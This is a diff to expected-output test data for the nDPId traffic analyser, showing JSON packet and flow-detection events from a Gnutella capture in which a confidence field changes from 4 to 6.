00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3DZAAIAGmnkKAAIPVagiacSAm+Tx8HlZALDCAlAQ+vCiYQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90785,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2AAAEAGnkMzRJnWCgACD2aNxJMAsrYBwo+\/QmAS\/\/9bRgAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAooEJAAIAGwBkKAAIPV3s26sR903KojXlhALG8AlAQ+vCj3AAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoeOBAAIAGqMYKAAIPM0SZ1sSTZo3Cj79CALK2AlAQ+vB4EgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":90787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90787,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2cAAEAGHo9QB\/zACgACDxroxIoAs7ABAD7ueWAS\/\/\/AYAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":90787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90787,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoIw9AAIAGfuoKAAIPUAf8wMSKGugAPu55ALOwAlAQ+vDdLAAA"} 
-01138{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01138{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS 
Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":90795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90795,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA24AAEAGymQugHJrCgACDxmyxHoAtKoBziHWF2AS\/\/++AAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":90796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90796,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoDztAAIAGPpsKAAIPLoBya8R6GbLOIdYXALSqAlAQ+vDazAAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":90799,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90799,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3IAAEAGvK6khAoZCgACD9gGxJIAtaQBToGf\/mAS\/\/+tmgAAAgQFtA=="} 
00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":90799,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90799,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoptFAAIAGmVIKAAIPpIQKGcSS2AZOgZ\/+ALWkAlAQ+vDKZgAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":90800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90800,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3YAAEAGCtCwY7AUCgACDxjKxIMAtp4BeVRy4GAS\/\/\/DVQAAAgQFtA=="} 
00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":90801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90801,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoGLRAAIAGdZUKAAIPsGOwFMSDGMp5VHLgALaeAlAQ+vDgIQAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90809,"flow_last_seen":90809,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90809,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":90809,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90809,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4BlIAAIAREmwKAAIPaO6s+nAJW\/wAJA6KHB0xAtgN+vD\/0M\/t\/ONIAwABAAUAAADDglFLQA=="} 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":90840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":90840,"pkt":"CAAn5uVZUlQAEjUCCABFAACBA44AAEARVOdo7qz6CgACD1v8cAkAbdSrHB0xAtgN+vD\/0M\/t\/ONIAwEBAE4AAAD8W2jurPoAAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEGAkRVQl9jATZQIAEZ8HQAiAgAAAAAAAEAAQNESFRDAAABglFLRIDlHEU="} 
@@ -955,8 +955,8 @@ 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":90843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90843,"pkt":"UlQAEjUCCAAn5uVZCABFAAAopBpAAIAGrC4KAAIPJo536sR3wkQjIZHCALeYAlAQ+vA2AwAA"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90845,"flow_last_seen":90845,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90845,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":90845,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90845,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4c0wAAIARymUKAAIPvD00t3AJLkwAJK1JGu4xAkJx0f\/\/24\/JSJ6wAwABAAUAAADDglFLQA=="} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -01553{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01553{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":90857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90857,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A6AAAEAReda8PTS3CgACDy5McAkAYD84Gu4xAkJx0f\/\/24\/JSJ6wAwEBAEEAAABMLrw9NLcAAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEHAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtE7kD0pA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90864,"flow_last_seen":90864,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90864,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":90864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90864,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4OIoAAIAR8bMKAAIPubtKrXAJ0PEAJMQW\/3wxAm1gREr\/fw\/7dxmzAwABAAUAAADDglFLQA=="} 
